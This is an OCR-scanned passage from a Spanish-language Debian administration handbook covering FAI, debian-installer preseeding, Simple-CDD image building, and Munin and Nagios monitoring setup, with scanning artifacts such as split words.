gurable  a  traves  de  archivos  y  scripts  almacenados  en  el  servidor;  no  se  crea  automaticamen- 
te  la  ubicacion  predeterminada  /srv/fai/config/,  por  lo  que  el  administrador  debe  crearla 
junto  con  los  archivos  relevantes.  La  mayoria  de  las  veces,  estos  archivos  seran  personalizados 
de  archivos  de  ejemplos  disponibles  en  la  documentacion  del  paquete  fai-doc,  en  el  directorio 
/us  r/s ha  re/doc/ fai-  doc/examples/ simple/  en  particular. 

Una  vez  que  definimos  los  perfiles,  el  programa  fai -setup  genera  los  elementos  necesarios 
para  iniciar  una  instalacion  FAI;  esto  significa  en  su  mayor  parte  preparar  o  actualizar  un  siste¬ 
ma  minimo  (raiz  NFS)  para  utilizar  durante  la  instalacion.  Una  alternativa  es  generar  un  CD  de 
arranque  dedicado  con  f  ai  -  cd. 

Crear  todos  estos  archivos  de  configuracion  requiere  entender  como  funciona  FAI.  Un  proceso 
de  instalacion  tipico  consiste  de  los  siguientes  pasos: 

■  obtener  un  nucleo  de  la  red  e  iniciarlo; 

■  montar  el  sistema  de  archivos  raiz  desde  NFS; 
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■  ejecutar  /usr/sbin/fai  que  controla  el  resto  del  proceso  (los  pasos  siguientes,  por  lo 
tanto,  son  iniciados  por  este  script); 

■  copiar  el  espacio  de  configuracion  desde  el  servidor  a  /f  ai/; 

■  ejecutar  fai- class.  Seejecutanenordenlos  scripts  /fai/ class/  [0-9]  [ 0 -  9 ]  *  y  devuel- 
ve  los  nombres  de  «clases»  que  aplican  a  la  maquina  siendo  instalada;  esta  informacion 
servira  como  base  para  los  pasos  siguientes.  Esto  permite  cierta  flexibilidad  en  la  defini- 
cion  de  los  servicios  a  instalar  y  configurar. 

■  obtener  una  cantidad  de  variables  de  configuracion,  que  dependen  de  las  clases  relevan- 
tes; 

■  particionar  los  discos  y  dar  formato  a  las  particiones  basandose  en  la  informacion  provista 
por  /f ai/diskconfig/cZase; 

■  montar  dichas  particiones; 

■  instalar  el  sistema  base; 

■  presembrar  la  base  de  datos  Debconf  con  fai-debconf; 

■  obtener  la  lista  de  paquetes  disponibles  para  APT; 

■  instalar  los  paquetes  enumerados  en  /f  ai/package_config /clase; 

■  ejecutar  los  scripts  postconfiguracion,  /f  ai/ script s/cZase/  [0-  9]  [0-9]  *; 

■  grabar  los  registros  de  instalacion,  desmontar  las  particiones  y  reiniciar. 


12.3.2.  Presembrado  de  Debian-lnstaller 

Despues  de  todo,  la  mejor  herramienta  para  instalar  sistemas  Debian  logicamente  deberfa  ser 
el  instalador  oficial  de  Debian.  Es  por  esto  que,  desde  su  concepcion,  se  diseno  debian-installer 
para  usarlo  de  forma  automatizada  aprovechando  la  infraestructura  que  provee  debconf.  Este  ul¬ 
timo  permite,  por  un  lado,  reducir  la  cantidad  de  preguntas  realizadas  (las  preguntas  escondidas 
utilizaran  la  respuesta  predeterminada  provista)  y  por  el  otro  proveer  respuestas  predetermi- 
nadas  por  separado  para  que  la  instalacion  pueda  no  ser  interactiva.  Se  conoce  a  esta  ultima 
funcionalidad  como  presembrado  («preseeding»). 


YENDOMAsallA  El  presembrado  permite  proveer  un  conjunto  de  respuestas  a  preguntas  Debconf 
Debconf  con  una  base  de  en  moment°  de  instalacion,  pero  estas  respuestas  son  estaticas  y  no  evolucionan 
datos  centralizada  con  t'emP°-  Debido  a  que  maquinas  ya  instaladas  puede  necesitar  ser  actualiza- 
das,  y  podrfan  requerir  nuevas  respuestas,  puede  definir  el  archivo  de  configuracion 
/etc/debconf  .  conf  para  que  Debconf  utilice  fuentes  de  datos  externas  (como  un 
servidor  de  directorio  LDAP  o  un  archivo  remoto  al  que  accede  con  NFS  o  Sam¬ 
ba).  Puede  definir  varias  fuentes  de  datos  externas  simultaneamente  y  que  estas  se 
complementen.  Todavia  utilizara  la  base  de  datos  local  (para  acceso  de  lectura  y  es- 
critura),  pero  generalmente  se  restringen  para  lectura  a  las  bases  de  datos  remotas. 
La  pagina  de  manual  debconf  .  conf  (5 )  describe  en  detalle  todas  las  posibilidades 
(necesitara  el  paquete  debconf-doc). 
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Utilizacion  de  un  archivo  de  presembrado 

Hay  varios  lugares  de  los  que  el  instalador  puede  obtener  un  archivo  de  presembrado: 

■  en  el  initrd  que  arranca  la  maquina;  en  este  caso,  el  presembrado  ocurre  muy  al  comienzo 
de  la  instalacion  y  puede  evitar  todas  las  preguntas.  Solo  debe  asegurarse  que  el  archivo 
tenga  el  nombre  p  reseed  .  cf  g  y  este  almacenado  en  la  raiz  del  initrd. 

■  en  el  medio  de  arranque  (CD  o  Have  USB);  el  presembrado  ocurre  tan  pronto  como  se 
monte  el  medio,  lo  que  significa  inmediatamente  despues  de  las  preguntas  sobre  idiomay 
distribucion  de  teclado.  Puede  utilizar  el  parametro  de  arranque  preseed/file  para  indicar 
la  ubicacion  del  archivo  de  presembrado  (por  ejemplo,  /cd  rom/preseed  .  cfg  cuando  se 
realizala  instalacion  desde  un  CD-ROM  o  /hd- media/p  reseed .  cfg  en  el  caso  de  una  Have 
USB). 

■  desde  la  red;  el  presembrado  ocurrira  entonces  solo  despues  que  se  configure  (automatica- 
mente)  la  red;  el  parametro  de  arranque  relevante  es  preseed/url=http://serv/dor/preseed. 
cfg. 

A  primera  vista,  incluir  el  archivo  de  presembrado  en  el  initrd  pareceria  la  solucion  mas  intere- 
sante;  sin  embargo,  rara  vez  se  la  utiliza  en  la  practica  porque  generar  un  initrd  de  instalacion 
es  bastante  complejo.  Las  otras  dos  soluciones  son  mucho  mas  comunes,  especialmente  debido 
a  que  los  parametros  de  arranque  proveen  otra  forma  de  presembrar  las  respuestas  a  las  pri- 
meras  preguntas  del  proceso  de  instalacion.  La  forma  usual  de  evitar  la  molestia  de  tipear  estos 
parametros  a  mano  en  cada  instalacion  es  guardarlos  en  la  configuracion  de  isolinux  (en  el 
caso  del  CD-ROM)  o  syslinux  (para  la  Have  USB). 


Creadon  de  un  archivo  de  presembrado 

Un  archivo  de  presembrado  es  un  archivo  en  texto  piano  en  el  que  cada  linea  contiene  la  respues- 
ta  a  una  pregunta  Debconf.  Cada  linea  esta  dividida  en  cuatro  campos  separados  por  espacios  en 
blancos  (espacios  o  tabulaciones)  como,  por  ejemplo,  d-i  mirror/suite  string  stable: 

■  el  primer  campo  es  el  «dueno»  de  la  pregunta;  utilizamos  «d-i»  para  las  preguntas  rele- 
vantes  al  instalador,  pero  tambien  puede  ser  el  nombre  de  un  paquete  para  las  preguntas 
que  provengan  de  un  paquete  Debian; 

■  el  segundo  campo  es  un  identificador  para  la  pregunta; 

■  tercero,  el  tipo  de  pregunta; 

■  el  cuarto  y  ultimo  campo  contiene  el  valor  de  la  respuesta.  Tenga  en  cuenta  que  debe  estar 
separado  del  tercer  campo  solo  por  un  espacio;  si  hay  mas  de  uno,  el  siguiente  caracter  de 
espacio  es  considerado  parte  del  valor. 

La  forma  mas  simple  de  escribir  un  archivo  de  presembrado  es  instalar  un  sistema  a  mano.  Luego, 
debconf -get-selections  -  -installer  proveera  las  respuestas  que  involucran  al  instalador. 
Puede  obtener  las  respuestas  sobre  otros  paquetes  con  debconf -get-selections.  Sin  embar¬ 
go,  una  solucion  mas  limpia  es  escribir  el  archivo  de  presembrado  a  mano,  comenzando  con  un 
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ejemplo  y  la  documentacion  de  referenda:  con  este  enfoque,  solo  necesitara  presembrar  las  pre- 
guntas  en  las  que  desea  modificar  la  respuesta  predeterminada;  utilizar  el  parametro  de  arran- 
que  priority=critical  le  indicara  a  Debconf  que  solo  realice  las  preguntas  crfticas  y  que  utilice  las 
respuestas  predeterminadas  para  las  demas. 


DOCUMENTACION  La  gui'a  de  instalacion,  disponible  en  internet,  incluye  documentacion  detallada 
Apendice  de  la  guia  de  s°bre  el  uso  de  un  archivo  de  presembrado  en  un  apendice.  Tambien  incluye  un 

instalacion  archivo  de  ejemplo  detallado  y  comentado,  que  puede  servir  como  base  para  per- 

sonalizaciones  locales. 

■*-  https : //www. debian . org/ releases/ jess ie/amd64/apb . html 

https : //www. debian . org/ releases/ jessie/example- p reseed . txt 


Creadon  de  un  medio  de  arranque  personalizado 

Saber  donde  almacenar  el  archivo  de  presembrado  esta  bien,  pero  la  ubicacion  no  lo  es  todo: 
uno  debe,  de  una  u  otra  forma,  alterar  el  medio  de  arranque  de  la  instalacion  para  modificar  los 
parametros  de  arranque  y  agregar  el  archivo  de  presembrado. 


Arranque  desde  la  red  Cuando  un  equipo  arranca  desde  la  red,  el  servidor  que  envia  los  ele- 
mentos  de  inicializacion  tambien  define  los  parametros  de  arranque.  Por  lo  tanto,  debe  modifi¬ 
car  la  configuracion  de  PXE  en  el  servidor  de  arranque;  mas  especificamente,  en  su  archivo  de 
configuracion  /tf tpboot/pxelinux .  cfg/def ault.  Definir  el  arranque  por  red  es  un  prerequi¬ 
site;  revise  la  gui'a  de  instalacion  para  mas  detalles. 

https : //www. debian . org/ releases/ jessie/amd64/ch04s05 . html 


Preparation  de  una  Have  USB  de  arranque  Una  vez  que  prepare  una  Have  de  arranque  (re¬ 
vise  la  Section  4.1.2,  «Arranque  desde  una  Have  USB»  pagina  53),  necesitara  unas  pocas  opera- 
ciones  adicionales.  Asumiendo  que  el  contenido  de  la  Have  se  encuentra  en  /media/usbdisk/: 

■  copie  el  archivo  de  presembrado  a  /media/usbdisk/p reseed  .  cfg 

■  edite  /media/usbdisk/syslinux.  cfg  y  agrege  los  parametros  de  arranque  necesarios 
(revise  el  ejemplo  a  continuation). 


Ejemplo  12.2  Archivo  syslinux.cfg  y  parametros  de  presembrado 


default  vmlinuz 

append  preseed/file=/hd-media/preseed . cfg  locale=en  US.UTF-8  keymap=us  language=us 
country=US  vga=788  initrd=initrd.gz 
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Creacion  de  una  imagen  de  CD-ROM  Una  Have  USB  es  un  medio  de  lectura  y  escritura, 
por  lo  que  es  sencillo  agregar  un  archivo  allf  y  cambiar  unos  pocos  parametros.  En  el  caso 
de  un  CD-ROM,  la  operacion  es  mas  compleja  ya  que  necesitamos  generar  una  imagen  ISO 
completa.  debian-cd  se  encarga  de  esto,  pero  es  bastante  extrano  utilizar  esta  herramienta:  ne- 
cesita  un  repositorio  local  y  requiere  entender  todas  las  opciones  que  provee  /usr/share/ 
debian-  cd/CONF .  sh;  aun  entonces,  debe  ejecutar  make  varias  veces.  Se  recomienda  leer  /usr/ 
sha  re/debian- cd/README. 

Habiendo  dicho  esto,  debian-cd  siempre  funciona  de  forma  similar:  genera  un  directorio  «ima- 
ge»  con  el  contenido  exacto  del  CD-ROM  y  luego  lo  convierte  en  un  archivo  ISO  con  una  herra¬ 
mienta  como  genisoimage,  mkisofs  o  xorriso.  El  directorio  de  imagen  es  completado  luego 
del  paso  make  image- trees  de  debian-cd.  En  este  punto,  agregaremos  el  archivo  de  presem- 
brado  en  el  directorio  apropiado  (usualmente  $TDIR/$C0DENAME/CD1/,  donde  $TDIRy  $CODE- 
NAME  son  parametros  definidos  por  el  archivo  de  configuracion  CONF.  sh).  El  CD-ROM  utiliza 
isolinux  como  gestor  de  arranque, y  debemos  adaptar  el  archivo  de  configuracion  que  genero 
debian-cd  para  poder  agregar  los  parametros  de  arranque  necesarios  (el  archivo  especifico  es 
$TDIR/$CODENAME/bootl/isolinux/isolinux .  cfg).  Luego  puede  continuar  el  proceso  «nor- 
mal»  y  generar  la  imagen  ISO  con  make  image  CD=1  (o  make  images  si  esta  generando  varios 
CD-ROMs). 


12.3.3.  Simple-CDD:  la  solucion  todo-en-uno 

Utilizar  solamente  un  archivo  de  presembrado  no  es  suficiente  para  satisfacer  todos  los  requi¬ 
sites  que  podrian  aparecer  en  despliegues  grandes.  Aunque  es  posible  ejecutar  algunos  scripts 
al  final  del  proceso  normal  de  instalacion,  todavia  no  es  muy  flexible  la  seleccion  del  conjunto 
de  paquetes  a  instalar  (basicamente,  solo  puede  seleccionar  «tareas»);  lo  que  es  mas  importante, 
esto  solo  permite  instalar  paquetes  Debian  oficiales  y  excluye  aquellos  generados  localmente. 

Por  el  otro  lado,  debian-cd  puede  integrar  paquetes  externos  y  se  puede  extender  debian- 
installer  agregando  nuevos  pasos  en  el  proceso  de  instalacion.  Combinando  estas  capacidades, 
deberfa  ser  posible  crear  un  instalador  completamente  personalizado  que  satisfaga  nuestras 
necesidades;  inclusive  deberfa  poder  configurar  algunos  servicios  luego  de  desempaquetar  los 
paquetes  necesarios.  Afortunadamente,  esto  no  es  solo  una  hipotesis  ya  que  esto  es  exactamente 
lo  que  hace  Simple-CDD  (en  el  paquete  simple-cdd). 

El  proposito  de  Simple-CDD  es  permitir  que  cualquiera  pueda  crear  facilmente  una  distribucion 
derivada  de  Debian  seleccionando  un  subconjunto  de  los  paquetes  disponibles,  preconfigurarlos 
con  Debconf,  agregar  software  especifico  y  ejecutar  scripts  personalizados  al  final  del  proceso 
de  instalacion.  Esto  coincide  con  la  filosoffa  de  «sistema  operativo  universal))  ya  que  cualquiera 
puede  adaptarlo  a  sus  necesidades. 


Creacion  de  perfiles 

Simple-CDD  define  «perfiles»  que  coinciden  con  el  concepto  de  «clases»  de  FAI;  una  maquina 
puede  tener  varios  perfiles  (determinados  en  el  momento  de  la  instalacion).  Se  define  un  perfil 
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con  un  conjunto  de  archivos  profiles/perfiZ 

■  el  archivo  .description  contiene  una descripcion de  una lfnea sobre  el perfil; 

■  el  archivo  .packages  enumera  los  paquetes  que  se  instalaran  automaticamente  si  se  se- 
lecciona  el  perfil; 

■  el  archivo  .  downloads  enumera  los  paquetes  que  se  almacenaran  en  el  medio  de  instala- 
cion  pero  no  se  instalaran  obligatoriamente; 

■  el  archivo  .  p  reseed  contiene  informacion  de  presembrado  para  las  preguntas  de  Debconf 
(para  el  instalador  y/o  los  paquetes); 

■  el  archivo  .  postinst  contiene  un  script  que  se  ejecutara  al  final  del  proceso  de  instala- 
cion; 

■  finalmente,  el  archivo  .  conf  permite  modificar  algunos  parametros  de  Simple-CDD  basa- 
do  en  los  perfiles  incluidos  en  la  imagen. 

El  perfil  default  («predeterminado»)  tiene  un  rol  particular  ya  que  siempre  esta  activo;  contiene 
lo  minimo  necesario  para  que  funcione  Simple-CDD.  Lo  unico  que  generalmente  personalizare- 
mos  en  este  perfile  es  el  parametro  de  presembrado  simple-cdd/profiles:  esto  permite  esquivar 
la  pregunta  sobre  los  perfiles  a  instalar  que  agrega  Simple-CDD. 

Sepa  tambien  que  necesitara  ejecutar  todo  desde  el  directorio  que  contenga  el  directorio 
profiles. 


Configuracion  y  uso  de  build- simple-  cdd 


VISTA  RAPIDA 

Archivo  de  configuracion 
detallado 


El  paquete  incluye  un  ejemplo  de  archivo  de  configuracion  de  Simple-CDD 
con  todos  los  parametros  posibles  (/usr/share/docs/simple- cdd/examples/ 
simple-  cdd  .  conf  .  detailed  .  gz).  Puede  utilizarlo  como  punto  de  partida  cuando 
cree  un  archivo  de  configuracion  personalizado. 


Simple-CDD  necesita  muchos  parametros  para  todo  su  funcionamiento.  En  la  mayoria  de  los 
casos  los  obtendra  de  un  archivo  de  configuracion  al  que  podemos  apuntar  con  la  opcion  -conf 
de  build -simple -cdd,  pero  tambien  podemos  especificarlos  como  parametros  especificos  al 
ejecutar  build  -  simple  -  cdd.  Aqui  hay  una  vista  rapida  sobre  como  funciona  este  programa  y 
como  utilizar  sus  parametros: 

■  el  parametro  profiles  enumera  los  perfiles  que  se  incluiran  en  la  imagen  de  CD-ROM  gene- 
rada; 

■  basado  en  la  lista  de  paquetes  necesarios,  Simple-CDD  descarga  los  archivos  necesarios 
desde  el  servidor  mencionado  en  server  y  los  reune  en  un  repositorio  parcial  (que  luego 
le  proveera  a  debian-cd); 

■  tambien  se  integraran  a  este  repositorio  local  los  paquetes  personalizados  mencionados 
en  local  packages; 
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■  luego  ejecutara  debian-cd  (con  una  ubicacion  predeterminada  que  puede  configurar  con 
la  variable  debian_cd_dir)  con  la  lista  de  paquetes  a  integrar; 

■  una  vez  que  debian-cd  prepare  este  directorio,  Simple-CDD  realiza  algunos  cambios  al 
mismo: 

•  agrega  los  archivos  que  contienen  los  perfiles  en  un  subdirectorio  simple  -  cdd  (que 
seran  incluidos  en  el  CD-ROM); 

•  tambien  se  agregaran  los  demas  archivos  enumerados  en  el  parametro  all_extras; 

•  ajustara  los  parametros  de  arranque  para  permitir  presembrado.  Puede  evitar  las 
preguntas  sobre  idioma  y  pais  si  almacena  la  informacion  necesaria  en  las  variables 
language  y  country. 

■  luego  debian-cd  genera  la  imagen  ISO  final. 


Generacion  de  una  imagen  ISO 

Una  vez  que  escribimos  un  archivo  de  configuracion  y  definimos  nuestros  perfiles,  el  paso  res- 
tante  es  ejecutar  build-simple-cdd  --conf  simple-cdd .  conf.  Luego  de  unos  minutos  ten- 
dremos  la  imagen  necesaria  en  images/debian-  8 . 0  -  amd64  -  CD  - 1 .  iso. 


12.4  Monitorizacion 


La  monitorizacion  es  un  termino  generico,  y  las  muchas  actividades  involucradas  tiene  varias 
objetivos:  por  un  lado,  seguir  el  uso  de  recursos  provistos  por  una  maquina  permite  anticipar 
saturacion  y  la  actualizacion  necesaria  que  le  seguira;  por  el  otro,  alertar  a  los  administradores 
tan  pronto  como  un  servicio  no  este  disponible  o  no  fucione  correctamente  significa  que  se 
podran  solucionar  mas  rapidamente  aquellos  problemas  que  sucedan. 

Munin  cubre  la  primera  area  mostrando  graficos  de  los  valores  historicos  de  una  cantidad  de 
parametros  (RAM  utilizada,  espacio  ocupado  en  disco,  carga  en  el  procesador,  trafico  de  red, 
carga  de  Apache/MySQL,  etc.).  Nagios  cubre  la  segunda  area,  revisando  regularmente  que  los 
servicios  esten  funcionando  y  disponibles,  enviando  alertas  a  traves  de  los  canales  apropiados 
(correo,  mensajes  de  texto,  etc.).  Ambos  tienen  un  diseno  modular,  lo  que  permite  crear  nuevos 
plugins  para  monitorizar  parametros  o  servicios  especificos. 


ALTERNATIVA 

Zabbix,  una  herramienta 
de  monitorizacion 
integrada 


Si  bien  Munin  y  Nagios  son  comunes,  no  son  los  unicos  jugadores  en  el  campo  de 
la  monitorizacion,  y  cada  uno  de  ellos  gestiona  la  mitad  de  la  tarea  (graficos  por  un 
lado,  alertas  por  otro).  Zabbix,  por  su  parte,  integra  ambas  partes  de  la  monitori¬ 
zacion;  tambien  tiene  una  interfaz  web  para  configurar  los  aspectos  mas  comunes. 
Credo  enormemente  en  los  ultimos  anos  y  ahora  se  le  puede  considerar  un  conten- 
diente  viable.  En  el  servidor  de  monitorizacion  se  instalaria  zabbix-server-pgsql  (o 
zabbix-server-mysql),  y  probablemente  tambien  zabbix-frontend-php  para  dispo- 
ner  de  una  interfaz  web.  En  las  maquinas  a  monitorizar  se  instalaria  zabbix-agent 
que  enviaria  los  datos  al  servidor. 


http://www.zabbix.com/ 
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ALTERNATIVA  Debido  a  divergencias  en  opiniones  sobre  el  modelo  de  desarrollo  de  Nagios  (que  es 
Icinga  una  bifurcacion  controlado  por  una  empresa),  una  cantidad  de  desarrolladores  bifurcaron  Nagios 
de  Nagios  Y  utilizaron  Icinga  como  su  nuevo  nombre.  Icinga  todavia  es  compatible  —  hasta 
ahora  —  con  los  plugins  y  configuraciones  de  Nagios,  pero  tambien  agrega  funcio- 
nalidad  adicional. 

http://www.icinga.org/ 


12.4.1.  Configuracion  de  Munin 

El  proposito  de  Munin  es  monitorizar  muchas  maquinas;  por  lo  tanto,  naturalmente  utiliza  una 
arquitectura  cliente/servidor.  El  equipo  central  —  el  graficador  —  recolecta  datos  de  todos  los 
equipos  monitorizados  y  genera  graficos  historicos. 


Configuracion  de  los  equipos  a  monitorizar 

El  primer  paso  es  instalar  el  paquete  munin-node.  El  demonio  que  instala  este  paquete  escucha 
en  el  puerto  4949  y  envi'a  los  datos  recolectados  por  todos  los  plugins  activos.  Cada  plugin  es  un 
programa  simple  que  devuelve  una  descripcion  de  los  datos  recolectados  y  el  ultimo  valor  medi- 
do.  Los  plugins  se  almacenan  en  /usr/share/munin/plugins/,  pero  realmente  solo  se  utilizan 
aquellos  con  un  enlace  simbolico  en  /etc/munin/plugins/. 

Cuando  instala  el  paquete,  se  determina  un  conjunto  de  plugins  activos  basados  en  el  softwa¬ 
re  disponible  y  la  configuracion  actual  del  equipo.  Sin  embargo,  esta  configuracion  automati- 
ca  depende  de  una  funcionalidad  que  debe  proveer  cada  plugin,  y  generalmente  es  buena  idea 
revisar  y  afinar  el  resultado  a  mano.  Puede  resultar  interesante  visitar  la  Galena  de  Plugins1  , 
incluso  aunque  no  todos  los  plugins  dipongan  de  documentacion  exhaustiva.  Sin  embargo,  to¬ 
dos  los  plugins  son  scripts  y  la  mayoria  son  bastante  simples  y  estan  bien  comentados.  Revisar 
/etc/munin/plugins/  es,  por  lo  tanto,  una  buena  forma  de  tener  una  idea  de  lo  que  hace  ca¬ 
da  plugin  y  determinar  si  alguno  debe  eliminarlo.  Similarmente,  activar  un  plugin  interesante 
que  se  encuentre  en  /usr/share/munin/plugins/  es  simplemente  cuestion  de  crear  un  enlace 
simbolico con  In  -sf  /usr/share/munin/plugins/plugin  /etc/munin/plugins/.  Sepa que 
cuando  el  nombre  de  un  plugin  finaliza  con  un  guion  bajo  «_»,  el  plugin  necesita  un  parametro. 
Debe  almacenar  este  parametro  en  el  nombre  del  enlace  simbolico;  por  ejemplo,  el  plugin  «if_» 
debe  activarse  con  un  enlace  simbolico  llamado  if_eth0  para  monitorizar  el  trafico  de  red  en 
la  interfaz  ethO. 

Una  vez  que  configure  correctamente  los  plugins,  debe  actualizar  el  demonio  de  configuracion 
para  describir  el  control  de  acceso  de  los  datos  recolectados.  Esto  involucra  directivas  allow  en 
el  archivo  /etc/munin/munin-  node .  conf .  La  configuracion  predeterminada  es  allow"127\.0\.0\ 
.1$,  lo  que  solo  permite  el  acceso  al  equipo  local.  Un  administrador  usualmente  agregara  una 
linea  similar  que  contenga  la  direccion  IP  del  equipo  graficador  y  luego  reiniciara  el  demonio 
con  service  munin-node  restart. 

^ttp :  //galle  ry.  munin  -  mon  it  o  ring,  org 
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YENDOMAsallA  Munin  incluye  documentacion  detallada  sobre  como  se  deben  comportar  los  plu- 
Creacion  de  plugins  8ins  Y  c°mo  desarrollar  plugins  nuevos. 

locales  »-  http://niunin-rronitoring.org/wiki/plugins 

La  mejor  forma  de  probar  un  plugin  es  ejecutarlo  en  las  mismas  condiciones  que 
lo  harfa  munin-node;  puede  simularlo  ejecutando  munin -run  plugin  como  root. 
Puede  proveer  un  posible  segundo  parametro  a  este  programa  (como  config)  que 
sera  provisto  como  parametro  al  plugin. 

Cuando  ejecuta  un  plugin  con  el  parametro  config,  debe  describirse  a  si  mismo 
devolviendo  un  conjunto  de  campos: 

$  sudo  munin-run  load  config 

graph  title  Load  average 
graph  args  --base  1000  -l  0 
graph  vlabel  load 
graphscale  no 
g raphcategory  system 
load. label  load 

graphinfo  The  load  average  of  the  machine  describes  how 

*—■  many  processes  are  in  the  run-queue  (scheduled  to  run 
"immediately"). 

load. info  5  minute  load  average 

La  especificacion  de  la  guia  de  referencia  de  plugins,  disponible  como  parte  de  la 
gufa  de  Munin,  describe  los  varios  campos  disponibles. 

»•  http : //munin . readthedocs . org/en/latest /reference/ plug in . html 

Cuando  lo  ejecuta  sin  parametros,  un  plugin  simplemente  devuelve  el  ultimo  valor 
medido;  por  ejemplo,  ejecutar  sudo  munin-run  load  podria  devolver  load  .  value 
0.12. 

Finalmente,  cuando  ejecute  un  plugin  con  el  parametro  autoconf ,  deberfa  devolver 
«yes»  (y  un  codigo  de  salida  0)  o  «no»  (con  un  codigo  de  salida  1)  segun  si  el  plugin 
deberia  estar  activado  en  este  equipo  o  no. 


Configuracion  del  graficador 

El  «graficador»  es  simplemente  el  equipo  que  agrupa  los  datos  y  genera  los  graficos  correspon- 
dientes.  El  software  necesario  se  encuentra  en  el  paquete  munin.  La  configuracion  estandar  eje¬ 
cuta  munin-cron  (una  vez  cada  5  minutos),  mediante  el  que  obtiene  datos  de  todos  los  equipos 
enumerados  en  /etc/munin/munin  .  conf  (de  forma  predeterminada  solo  incluye  al  equipo  lo¬ 
cal),  guarda  los  datos  historicos  en  archivos  RRD  ( base  de  datos  Round  Robin :  «Round  Robin  Databa¬ 
se  »,  un  formato  de  archivo  disenado  para  almacenar  datos  que  varian  en  el  tiempo)  almacenados 
en  /va  r/lib/munin/  y  genera  una  pagina  EiTML  con  los  graficos  en  /var/cache/munin/www/. 

Por  lo  tanto,  debe  enumerar  todas  las  maquinas  monitorizadas  en  el  archivo  de  configuracion 
/etc/munin/munin .  conf.  Cada  maquina  es  enumerada  como  una  section  completa  con  el  nom- 
bre  que  coincide  con  el  equipo  y  al  menos  un  elemento  address  que  provee  la  direction  IP  co- 
rrespondiente. 
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[ftp. falcot . com] 

address  192.168.0.12 
use  nodename  yes 


Las  secciones  pueden  ser  mas  complejas  y  describir  graficos  adicionales  que  puede  crear  com- 
binando  datos  de  varias  maquinas.  Los  ejemplos  que  provee  el  archivo  de  configuracion  son 
buenos  puntos  de  partida  para  personalizar. 

El  ultimo  paso  es  publicar  las  paginas  generadas;  esto  involucra  configurar  un  servidor  web  para 
que  el  contenido  de  /var/cache/munin/www/  este  disponible  en  un  sitio  web.  Generalmente 
restringira  el  acceso  a  este  sitio  web,  ya  sea  con  un  mecanismo  de  autenticacion  o  un  control  de 
acceso  basado  en  IP.  Revise  la  Seccion  11.2,  «Servidor  web  (HTTP)»  pagina  285  para  los  detalles 
relevantes. 


12.4.2.  Configuracion  de  Nagios 

A  diferencia  de  Munin,  Nagios  no  necesita  instalar  algo  en  los  equipos  monitorizados;  la  mayorfa 
de  las  veces,  se  utiliza  Nagios  para  revisar  la  disponibilidad  de  servicios  de  red.  Por  ejemplo, 
Nagios  puede  conectarse  a  un  servidor  web  y  revisar  si  puede  obtener  una  pagina  web  dada  en 
un  tiempo  especificado. 


Instalacion 

El  primer  paso  para  configurar  Nagios  es  instalar  los  paquetes  nagios3,  nagios-plugins  y  nagios3- 
doc.  La  instalacion  de  estos  paquetes  configurara  la  interfaz  web  y  creara  un  primer  usuario 
nagiosadmin  (para  el  que  pedira  una  contrasena).  Agregar  otros  usuarios  es  tan  simple  como 
agregarlos  al  archivo  /etc/nagios3/htpasswd  .users  con  el  programa  htpasswd  de  Apache. 
Si  no  se  muestra  ninguna  pregunta  Debconf  durante  su  instalacion,  puede  utilizar  dp  kg  -  recon 
figu  re  nagios3-  cgi  para  definir  la  contrasena  de  nagiosadmin. 

Apuntar  un  navegador  a  http://serv/dor/nagios3/  mostrara  la  interfaz  web;  en  particular  vera 
que  Nagios  ya  monitoriza  algunos  parametros  de  la  maquina  en  la  que  ejecuta.  Sin  embargo, 
algunas  caracteristicas  interactivas  como  agregar  comentarios  a  los  equipos  no  funcionaran. 
Estas  caracteristicas  estan  desactivadas  en  la  configuracion  predeterminada  de  Nagios,  la  cual 
es  muy  restrictiva  por  cuestiones  de  seguridad. 

Como  esta  documentado  en  /usr/share/doc/nagios3/README.Debian,  para  activar  algunas 
funcionalidades  deberemos  editar  el  archivo  /et  c/nagios3/ nagios  .  cf  g  y  definir  su  parametro 
check_external_command  como  «1».  Tambien  necesitaremos  configurar  permisos  de  escritura 
al  directorio  que  utiliza  Nagios,  ejecutando  algo  similar  a: 
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#  service  nagios3  stop 

[...] 

#  dpkg-statoverride  --update  --add  nagios  www-data  2710  /var/lib/nagios3/rw 

#  dpkg-statoverride  --update  --add  nagios  nagios  751  /var/lib/nagios3 

#  service  nagios3  start 

[...] 


Configuration 

La  interfaz  web  de  Nagios  es  bastante  agradable,  pero  no  permite  configuracion  ni  puede  utilizar- 
la  para  agregar  equipos  o  servicios  a  monitorizar.  Se  administra  toda  la  configuracion  a  traves 
de  archivos  referenciados  en  el  archivo  de  configuracion  central,  /etc/nagios3/nagios .  cfg. 

No  debe  adentrarse  en  estos  archivos  sin  entender  algunos  conceptos  de  Nagios.  La  configura¬ 
cion  enumera  objetos  de  los  siguientes  tipos: 

■  a  «host»  es  una  maquina  a  monitorizar; 

■  un  «hostgroup»  es  un  conjunto  de  equipos  que  deben  ser  agrupados  para  visualizacion  o 
para  abstraer  algunos  elementos  de  configuracion  en  comun; 

■  un  «service»  es  un  elemento  a  probar  relacionado  a  un  equipo  o  grupo.  La  mayoria  de 
las  veces  sera  un  chequeo  de  un  servicio  de  red,  pero  tambien  puede  incluir  revisar  que 
algunos  parametros  estan  dentro  de  un  rango  aceptable  (por  ejemplo,  espacio  libre  en  el 
disco  o  carga  del  procesador); 

■  un  «servicegroup»  es  un  conjunto  de  servicios  que  deben  ser  agrupados  para  visualizacion; 

■  un  «contact»  es  una  persona  que  puede  recibir  alertas; 

■  un  «contactgroup»  es  un  conjunto  de  contactos; 

■  un  «timeperiod»  es  un  rango  de  tiempo  durante  el  que  se  deben  revisar  algunos  servicios; 

■  un  «command»  es  la  linea  de  ordenes  ejecutada  para  revisar  un  servicio  dado. 

Segun  su  tipo,  cada  objeto  tiene  una  cantidad  de  propiedades  que  podemos  personalizar.  Una 
lista  completa  seria  demasiado  extensa,  pero  las  propiedades  mas  importantes  son  las  relaciones 
entre  objetos. 

Un  «service»  utiliza  un  «command»  para  revisar  el  estado  de  una  caracterfstica  en  un  «host»  (o 
«hostgroup» )  durante  un  «timeperiod».  En  caso  de  un  problema,  Nagios  envia  una  alerta  a  todos 
los  miembros  de  un  «contactgroup»  relacionado  con  el  servicio.  Se  envia  la  alerta  a  cada  miembro 
segun  el  canal  descripto  en  el  objeto  «contact»  asociado. 

Un  sistema  de  herencia  permite  compartir  facilmente  un  conjunto  de  propiedades  entre  varios 
objetos  sin  duplicar  informacion.  Lo  que  es  mas,  la  configuracion  inicial  incluye  algunos  objetos 
estandar;  en  muchos  casos,  definir  nuevos  equipos,  servicios  y  contactos  es  tan  simple  como 
